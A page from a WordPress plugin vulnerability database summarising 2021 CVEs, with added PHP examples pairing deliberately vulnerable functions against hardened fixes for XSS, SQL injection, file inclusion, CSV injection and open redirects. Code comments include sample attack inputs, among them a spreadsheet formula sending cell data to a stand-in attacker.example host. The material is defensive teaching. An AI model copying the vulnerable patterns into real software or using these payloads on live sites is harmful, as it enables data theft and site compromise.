Threat Database

Showing 721-740 of 808 records
Threat Entry Updated 2024-11-21

CVE-2021-24495 - Marmoset Viewer Plugin

The Marmoset Viewer WordPress plugin before 1.9.3 does not properly sanitise, validate or escape the 'id' parameter before outputting it back in the page, leading to a reflected Cross-Site Scripting issue.

MEDIUM CVSS 6.1 2021-08-09
Threat Entry Updated 2024-11-21

CVE-2021-24505 - Forms Plugin

The Forms WordPress plugin before 1.12.3 did not sanitise its input fields, leading to Stored Cross-Site Scripting issues: an authenticated user could place an XSS payload in the Forms "Add new" field.

MEDIUM CVSS 5.4 2021-08-09
Threat Entry Updated 2025-05-07

CVE-2021-24502 - WP Google Map Plugin

The WP Google Map WordPress plugin before 1.7.7 did not sanitise or escape the Map Title before outputting it in the page, leading to a Stored Cross-Site Scripting issue exploitable by high privilege users, even when the unfiltered_html capability is disallowed.

MEDIUM CVSS 4.8 2021-08-09
Threat Entry Updated 2024-11-21

CVE-2021-24498 - Calendar Event Multi View Plugin

The Calendar Event Multi View WordPress plugin before 1.4.01 does not sanitise or escape the 'start' and 'end' GET parameters before outputting them in the page (via php/edit.php), leading to a reflected Cross-Site Scripting issue.

MEDIUM CVSS 6.1 2021-08-02
Threat Entry Updated 2024-11-21

CVE-2021-24496 - Community Events Plugin

The Community Events WordPress plugin before 1.4.8 does not sanitise, validate or escape its importrowscount and successimportcount GET parameters before outputting them back in an admin page, leading to a reflected Cross-Site Scripting issue which will be executed in the context of a logged-in administrator.

MEDIUM CVSS 6.1 2021-08-02
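Added illustrative example for the reflected XSS entries above (Marmoset Viewer, Calendar Event Multi View, Community Events); this is not code from any of those plugins. It takes the pattern the advisories describe, a GET parameter written back into an admin page, and puts the unescaped version next to one that validates and escapes per output context. The function names, the 'back' parameter and the page they belong to are assumptions.

```php
<?php
// Added example (not code from any plugin on this page). It reproduces the
// pattern behind the reflected XSS entries: a GET parameter written back into
// an admin page without escaping, next to the hardened form. Parameter names
// follow the Community Events advisory; the function names and the 'back'
// parameter are assumed.

// Vulnerable: the raw query-string values land in element content and in an
// attribute. A crafted link such as
//   ?importrowscount=<script>alert(document.cookie)</script>
// or
//   ?back=" onmouseover="alert(1)
// executes in the browser of the logged-in admin who follows it.
function import_summary_vulnerable( array $query ) {
    $count = isset( $query['importrowscount'] ) ? $query['importrowscount'] : '0';
    $back  = isset( $query['back'] ) ? $query['back'] : '';
    return '<p>Imported ' . $count . ' rows.</p>'
         . '<a href="' . $back . '">Back</a>';
}

// Hardened: validate where the type allows it, then escape for the exact
// output context. WordPress ships one escaper per context:
//   esc_html()       element content
//   esc_attr()       attribute values
//   esc_url()        href/src (also rejects javascript: and data: schemes)
//   wp_json_encode() values embedded in inline JavaScript
function import_summary_fixed( array $query ) {
    // A row count is a non-negative integer or nothing; absint() enforces that.
    $count = isset( $query['importrowscount'] ) ? absint( $query['importrowscount'] ) : 0;
    $back  = isset( $query['back'] ) ? esc_url( $query['back'] ) : '';

    $html = '<p>Imported ' . esc_html( (string) $count ) . ' rows.</p>';
    if ( '' !== $back ) {
        // esc_url() output is already attribute-safe; no second escaper needed.
        $html .= '<a href="' . $back . '">Back</a>';
    }
    // A free-text value in an attribute gets esc_attr():
    $html .= '<input type="hidden" name="rows" value="' . esc_attr( (string) $count ) . '">';
    // If the value must reach script code, emit JSON, never esc_html():
    $html .= '<script>var importedRows = ' . wp_json_encode( $count ) . ';</script>';
    return $html;
}

// Usage inside an admin page callback. A nonce on the import URL, checked with
// check_admin_referer(), also stops an attacker from crafting the link at all:
//   echo import_summary_fixed( wp_unslash( $_GET ) );
```

The validation step (absint) is what removes the problem for the numeric parameters; the escaping step is what protects the free-text ones, and both belong at the point of output rather than at the top of the request, so that a value reused in a second context is escaped for that context too.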
Threat Entry Updated 2024-11-21

CVE-2021-24461 - FAQ Builder AYS Plugin

The get_faqs() function in the FAQ Builder AYS WordPress plugin before 1.3.6 did not whitelist or validate the orderby parameter before using it in SQL statements passed to the get_results() DB calls, leading to SQL injection issues in the admin dashboard.

HIGH CVSS 8.8 2021-08-02
Threat Entry Updated 2024-11-21

CVE-2021-24459 - Survey Maker Plugin

The get_results() and get_items() functions in the Survey Maker WordPress plugin before 1.5.6 did not whitelist or validate the orderby parameter before using it in SQL statements passed to the get_results() DB calls, leading to SQL injection issues in the admin dashboard.

HIGH CVSS 8.8 2021-08-02
Threat Entry Updated 2024-11-21

CVE-2021-24457 - Portfolio Responsive Gallery Plugin

The get_portfolios() and get_portfolio_attributes() functions in the class-portfolio-responsive-gallery-list-table.php and class-portfolio-responsive-gallery-attributes-list-table.php files of the Portfolio Responsive Gallery WordPress plugin before 1.1.8 did not whitelist or validate the orderby parameter before using it in SQL statements passed to the get_results() DB calls, leading to SQL injection issues in the admin dashboard.

HIGH CVSS 8.8 2021-08-02
Threat Entry Updated 2024-11-21

CVE-2021-24455 - Tutor LMS Plugin

The Tutor LMS – eLearning and online course solution WordPress plugin before 1.9.2 did not escape the Summary field of Announcements (when outputting it in an attribute), which can be created by users as low as Tutor Instructor. This leads to a Stored Cross-Site Scripting issue, which is triggered when viewing the Announcements list, and could result in privilege escalation when viewed by an admin.

MEDIUM CVSS 5.4 2021-08-02
Threat Entry Updated 2024-11-21

CVE-2021-24443 - Youzify Plugin

The About Me widget of the Youzify – BuddyPress Community, User Profile, Social Network & Membership WordPress plugin before 1.0.7 does not properly sanitise its Biography field, allowing any authenticated user to set Cross-Site Scripting payloads in it, which will be executed when viewing the affected user profile. This could allow a low privilege user to gain unauthorised access to the admin side of the blog by targeting an admin and inducing them to view the attacker's profile, where the payload could, for example, add a rogue account.

MEDIUM CVSS 5.4 2021-08-02
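Added illustrative example for the stored XSS entries above (WP Google Map, Tutor LMS, Youzify); this is not the code of any of those plugins. It shows the two layers a stored field needs: filtering on save, keyed on the unfiltered_html capability the way WordPress core treats post content, and escaping on output, since kses filtering alone does not protect an attribute context. The post meta keys, field names and function names are assumptions.

```php
<?php
// Added example, not the code of WP Google Map, Tutor LMS or Youzify. It shows
// the save-time filtering those entries lacked and why output escaping is
// still required afterwards. Meta keys, field names and functions are assumed.

// Vulnerable: user input is stored and later printed verbatim. Any user able
// to submit the field, down to a Contributor or Instructor, can store
//   " onmouseover="alert(document.domain)
// or <script>...</script>, and it runs for every admin who views the list.
function save_announcement_vulnerable( array $post_data ) {
    update_post_meta( $post_data['id'], 'summary', $post_data['summary'] );
    update_post_meta( $post_data['id'], 'body', $post_data['body'] );
}
function render_announcement_vulnerable( $summary, $body ) {
    return '<a title="' . $summary . '">View</a>'
         . '<div class="body">' . $body . '</div>';
}

// Hardened save: choose the filter by what the field is allowed to contain.
function save_announcement_fixed( array $post_data ) {
    $id      = absint( $post_data['id'] );
    $summary = wp_unslash( $post_data['summary'] );
    $body    = wp_unslash( $post_data['body'] );

    // A plain-text field (a title, a summary) never legitimately holds
    // markup: strip it outright, for every role.
    $summary = sanitize_text_field( $summary );

    // A rich-text field follows the rule core applies to post content: only
    // users holding unfiltered_html may store arbitrary HTML. Everybody else,
    // including administrators where that capability is withheld (multisite,
    // DISALLOW_UNFILTERED_HTML), is reduced to the post allow-list, which
    // drops <script>, on* handlers and javascript: URLs.
    if ( ! current_user_can( 'unfiltered_html' ) ) {
        $body = wp_kses_post( $body );
    }

    update_post_meta( $id, 'summary', $summary );
    update_post_meta( $id, 'body', $body );
}

// Hardened output. Filtering on save is not a substitute for this:
// wp_kses_post() keeps a bare double quote because it is plain text, so a
// value placed in an attribute still needs esc_attr(); element content needs
// esc_html(); rich HTML is passed through wp_kses_post() again at print time.
function render_announcement_fixed( $summary, $body ) {
    return '<a title="' . esc_attr( $summary ) . '">View</a>'
         . '<span>' . esc_html( $summary ) . '</span>'
         . '<div class="body">' . wp_kses_post( $body ) . '</div>';
}
```

The capability check is the detail the WP Google Map entry turns on: an administrator without unfiltered_html is, for this purpose, an untrusted author, and a plugin that stores their input raw has reintroduced exactly the HTML core would have refused.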
Threat Entry Updated 2024-11-21

CVE-2021-24447 - WP Image Zoom Plugin

The WP Image Zoom WordPress plugin before 1.47 did not validate its tab parameter before using it in the include_once() function, leading to a local file inclusion issue in the admin dashboard.

MEDIUM CVSS 5.3 2021-07-19
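Added illustrative example for the local file inclusion entry above; this is not the WP Image Zoom code. It shows the include-by-parameter pattern the advisory describes and the allow-list replacement in which the request value only selects a key and never reaches the filesystem path. Directory layout, tab names, the settings capability and function names are assumptions.

```php
<?php
// Added example, not the WP Image Zoom code. Directory layout, tab names and
// function names are assumed.

// Vulnerable: the request decides which file PHP includes. A value containing
// ../ walks the include out of tabs/, so, for instance (hypothetical path),
//   ?tab=../../../../../tmp/payload
// includes /tmp/payload.php if the attacker has managed to write a file there
// (via another upload or log-poisoning primitive), and PHP executes it.
function render_settings_tab_vulnerable( $tab ) {
    include_once plugin_dir_path( __FILE__ ) . 'tabs/' . $tab . '.php';
}

// Hardened: the parameter only selects a key; the filesystem path is built
// from constants the attacker cannot influence.
function render_settings_tab_fixed( $tab ) {
    $tabs = array(
        'general'  => 'tabs/general.php',
        'styling'  => 'tabs/styling.php',
        'advanced' => 'tabs/advanced.php',
    );
    if ( ! is_string( $tab ) || ! array_key_exists( $tab, $tabs ) ) {
        $tab = 'general'; // unknown value: fall back, do not build a path
    }
    include_once plugin_dir_path( __FILE__ ) . $tabs[ $tab ];
}

// Usage in the settings page callback. The capability check matters as well:
// the original issue was reachable only in the admin dashboard, and a page
// registered with a weaker capability widens who can reach the include.
function settings_page() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions' );
    }
    $tab = isset( $_GET['tab'] ) ? sanitize_key( $_GET['tab'] ) : 'general';
    render_settings_tab_fixed( $tab );
}
```

sanitize_key() reduces the value to lowercase letters, digits, underscore and hyphen, which on its own would already remove the dot and slash; the allow-list is still the control that matters, because it means a new tab file has to be registered deliberately rather than becoming reachable by existing on disk.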
Threat Entry Updated 2024-11-21

CVE-2021-24442 - Poll, Survey, Questionnaire and Voting system Plugin

The Poll, Survey, Questionnaire and Voting system WordPress plugin before 1.5.3 did not sanitise, escape or validate the date_answers[] POST parameter before using it in a SQL statement when sending a Poll result, allowing unauthenticated users to perform SQL Injection attacks.

CRITICAL CVSS 9.8 2021-07-12
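Added illustrative example for the SQL injection entries on this page; this is not the code of FAQ Builder AYS, Survey Maker, Portfolio Responsive Gallery or the Poll, Survey, Questionnaire and Voting system plugin. It covers both injection points those advisories describe: an orderby value spliced into ORDER BY, where identifiers cannot be bound as parameters and an allow-list is the fix, and a POST array of answer values spliced into WHERE, where each value is bound through $wpdb->prepare(). Table and column names are assumptions.

```php
<?php
// Added example, not the code of the plugins in the SQL injection entries.
// Table and column names are assumed.

// Vulnerable: both $orderby and every $answers[] element end up verbatim in
// the statement.
//   orderby=id,(SELECT SLEEP(5))        -> time-based blind injection
//   date_answers[]=1) OR 1=1 -- -       -> collapses the WHERE clause
function get_items_vulnerable( $orderby, $order, array $answers ) {
    global $wpdb;
    $table = $wpdb->prefix . 'my_answers';
    $ids   = implode( ',', $answers );
    return $wpdb->get_results(
        "SELECT * FROM $table WHERE answer_id IN ($ids) ORDER BY $orderby $order"
    );
}

function get_items_fixed( $orderby, $order, array $answers ) {
    global $wpdb;
    $table = $wpdb->prefix . 'my_answers';

    // (1) Identifiers: map the request value onto a fixed list of columns.
    //     prepare() has no placeholder that validates a column name
    //     (%i, WordPress 6.2+, only backtick-quotes it), and
    //     sanitize_sql_orderby() checks shape, not membership, so an explicit
    //     allow-list is the control.
    $allowed_columns = array( 'id', 'answer_id', 'created' );
    if ( ! in_array( $orderby, $allowed_columns, true ) ) {
        $orderby = 'id';
    }
    $order = ( 'DESC' === strtoupper( (string) $order ) ) ? 'DESC' : 'ASC';

    // (2) Values: coerce to the expected type, then bind. IN (...) needs one
    //     placeholder per element; prepare() takes the values as variadic args.
    $answers = array_values( array_filter( array_map( 'absint', $answers ) ) );
    if ( empty( $answers ) ) {
        return array();
    }
    $placeholders = implode( ',', array_fill( 0, count( $answers ), '%d' ) );

    // Identifiers were validated above, so interpolating them is safe; the
    // values go through prepare(). The format string itself must never
    // contain a user-supplied value.
    $sql = $wpdb->prepare(
        "SELECT * FROM $table WHERE answer_id IN ($placeholders) ORDER BY $orderby $order",
        ...$answers
    );
    return $wpdb->get_results( $sql );
}

// Usage from a POST handler (unauthenticated in the Poll plugin's case, which
// is why this path rates CRITICAL):
//   $answers = isset( $_POST['date_answers'] ) ? (array) $_POST['date_answers'] : array();
//   $rows    = get_items_fixed( $_GET['orderby'] ?? 'id', $_GET['order'] ?? 'ASC', $answers );
```

The distinction to keep in mind is that prepare() protects values only. The three admin-dashboard entries are all identifier injections, which no amount of quoting fixes; the Poll entry is a value injection, which prepare() fixes completely once every element of the array has its own placeholder.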
Threat Entry Updated 2024-11-21

CVE-2021-24441 - Sign-up Sheets Plugin

The Sign-up Sheets WordPress plugin before 1.0.14 does not sanitise or validate the Sheet title when generating the CSV to export, which could lead to a CSV injection issue.

HIGH CVSS 8.0 2021-07-12
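Added illustrative example for the CSV injection entry above; this is not the Sign-up Sheets code. It shows how a stored sheet title becomes a formula when the exported file is opened in a spreadsheet, and an export routine that neutralises formula starters while leaving numeric cells alone. The column names and the sample row are constructed for the example.

```php
<?php
// Added example, not the Sign-up Sheets code. Column names and the sample
// row below are constructed.

// Vulnerable export: the title is written exactly as stored. A title such as
//   =HYPERLINK("http://attacker.example/?"&A2,"Click to view")
// or  =cmd|'/C calc'!A0   (DDE, on spreadsheet versions that still honour it)
// is text in WordPress but a formula for whoever opens the CSV.
function export_sheet_csv_vulnerable( array $rows, $handle ) {
    fputcsv( $handle, array( 'Sheet title', 'Name', 'Email' ) );
    foreach ( $rows as $row ) {
        fputcsv( $handle, array( $row['title'], $row['name'], $row['email'] ) );
    }
}

// Neutralise any cell a spreadsheet would evaluate: cells beginning with
// = + - @ or a tab/carriage return. A leading single quote forces text mode;
// it survives in the file, which is the accepted trade-off for this defence.
function csv_safe_cell( $value ) {
    $value = (string) $value;
    // Negative and signed numbers start with '-' or '+' but are not formulas.
    if ( is_numeric( $value ) ) {
        return $value;
    }
    if ( preg_match( '/^[=+\-@\t\r]/', $value ) ) {
        return "'" . $value;
    }
    return $value;
}

function export_sheet_csv_fixed( array $rows, $handle ) {
    fputcsv( $handle, array( 'Sheet title', 'Name', 'Email' ) );
    foreach ( $rows as $row ) {
        // fputcsv() still handles quoting: embedded double quotes are doubled
        // and the field is enclosed, so the prefix cannot be split off.
        fputcsv( $handle, array_map(
            'csv_safe_cell',
            array( $row['title'], $row['name'], $row['email'] )
        ) );
    }
}

// Constructed sample, not from the advisory:
//   $rows = array( array(
//       'title' => '=HYPERLINK("http://attacker.example","open")',
//       'name'  => 'Ann',
//       'email' => 'ann@example.com',
//   ) );
//   export_sheet_csv_fixed( $rows, fopen( 'php://output', 'w' ) );
// emits, as the data row:
//   "'=HYPERLINK(""http://attacker.example"",""open"")",Ann,ann@example.com
```

Sanitising the title on save (sanitize_text_field) does not help here, since an equals sign is ordinary text to WordPress; the control belongs in the export path, at the boundary where the data changes consumer.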
Threat Entry Updated 2024-11-21

CVE-2021-24439 - Browser Screenshots Plugin

The Browser Screenshots WordPress plugin before 1.7.6 allowed authenticated users with a role as low as Contributor to perform Stored Cross-Site Scripting attacks as the image_class parameter of the browser-shot shortcode was not escaped.

MEDIUM CVSS 5.4 2021-07-12
Threat Entry Updated 2024-11-21

CVE-2021-24424 - WP Reset Plugin

The WP Reset – Most Advanced WordPress Reset Tool WordPress plugin before 1.90 did not sanitise or escape its extra_data parameter when creating a snapshot via the admin dashboard, leading to an authenticated Stored Cross-Site Scripting issue.

MEDIUM CVSS 5.4 2021-07-12
Threat Entry Updated 2024-11-21

CVE-2021-24421 - WP JobSearch Plugin

The WP JobSearch WordPress plugin before 1.7.4 did not sanitise or escape several of its parameters from the my-resume page before outputting them in the page, allowing low privilege users to place JavaScript payloads in them and leading to a Stored Cross-Site Scripting issue.

MEDIUM CVSS 5.4 2021-07-12
Threat Entry Updated 2024-11-21

CVE-2021-24440 - Sign-up Sheets Plugin

The Sign-up Sheets WordPress plugin before 1.0.14 did not sanitise or escape some of its fields when creating a new sheet, allowing high privilege users to add JavaScript in them, leading to a Stored Cross-Site Scripting issue. The payloads will be triggered when viewing the 'All Sheets' page in the admin dashboard.

MEDIUM CVSS 4.8 2021-07-12
Threat Entry Updated 2024-11-21

CVE-2021-24419 - WP YouTube Lyte Plugin

The WP YouTube Lyte WordPress plugin before 1.7.16 did not sanitise or escape its lyte_yt_api_key and lyte_notification settings before outputting them back in the page, allowing high privilege users to set XSS payloads in them and leading to Stored Cross-Site Scripting issues.

MEDIUM CVSS 4.8 2021-07-12
Threat Entry Updated 2024-11-21

CVE-2021-24406 - wpForo Forum Plugin

The wpForo Forum WordPress plugin before 1.9.7 did not validate the redirect_to parameter in the login form of the forum, leading to an open redirect issue after a successful login. Such an issue could allow an attacker to induce a user to use a login URL that redirects to a website under the attacker's control, a replica of the legitimate one, asking them to re-enter their credentials (which will then be in the attacker's hands).

MEDIUM CVSS 6.1 2021-07-06
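Added illustrative example for the open redirect entry above; this is not the wpForo code. It places a login handler that forwards to whatever redirect_to says next to the WordPress-native fix, wp_validate_redirect() and wp_safe_redirect(), which confine the target to the site's own host or to hosts explicitly listed through the allowed_redirect_hosts filter. Function names and the partner host are assumptions.

```php
<?php
// Added example, not the wpForo code. Function names and the partner host in
// the filter below are assumed.

// Vulnerable: a link such as
//   /forum/login?redirect_to=https://attacker.example/wp-login-lookalike
// logs the victim in on the real site and then forwards them to a replica
// that asks for the credentials a second time.
function after_login_vulnerable( $redirect_to ) {
    wp_redirect( $redirect_to ? $redirect_to : home_url( '/' ) );
    exit;
}

// Hardened: wp_validate_redirect() rejects any host not in the allow-list,
// scheme-relative targets (//attacker.example) and non-http(s) schemes such
// as javascript:, returning the fallback instead. wp_safe_redirect() applies
// the same check internally; calling the validator first just lets this code
// choose its own fallback rather than the admin dashboard.
function after_login_fixed( $redirect_to ) {
    $target = wp_validate_redirect( (string) $redirect_to, home_url( '/' ) );
    wp_safe_redirect( $target );
    exit;
}

// If a second, known host legitimately needs to be a redirect target, add it
// explicitly instead of accepting every host:
add_filter( 'allowed_redirect_hosts', function ( array $hosts ) {
    $hosts[] = 'community.example.com'; // assumed partner host
    return $hosts;
} );

// What the validator does with constructed inputs, assuming the site runs at
// https://example.com:
//   wp_validate_redirect( 'https://attacker.example/', '/' )  -> '/'
//   wp_validate_redirect( '//attacker.example/', '/' )        -> '/'
//   wp_validate_redirect( 'javascript:alert(1)', '/' )        -> '/'
//   wp_validate_redirect( '/forum/topic/42', '/' )            -> '/forum/topic/42'
//   wp_validate_redirect( 'https://example.com/forum/', '/' ) -> 'https://example.com/forum/'
```

The same check should also cover the redirect_to value a plugin echoes into its login form as a hidden field; validating it on the way out of the form, not only on the way into the redirect, means the site never advertises an off-site target in its own markup.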
Threat Entry Updated 2024-11-21

CVE-2021-24494 - WP Offload SES Lite Plugin

The WP Offload SES Lite WordPress plugin before 1.4.5 did not escape some of the fields in the Activity page of the admin dashboard, such as the email's id, subject and recipient, which could lead to Stored Cross-Site Scripting issues when an attacker can control any of these fields, like the subject when filling a contact form for example. The XSS will be executed in the context of a logged in admin viewing the Activity tab of the plugin.

MEDIUM CVSS 5.4 2021-07-06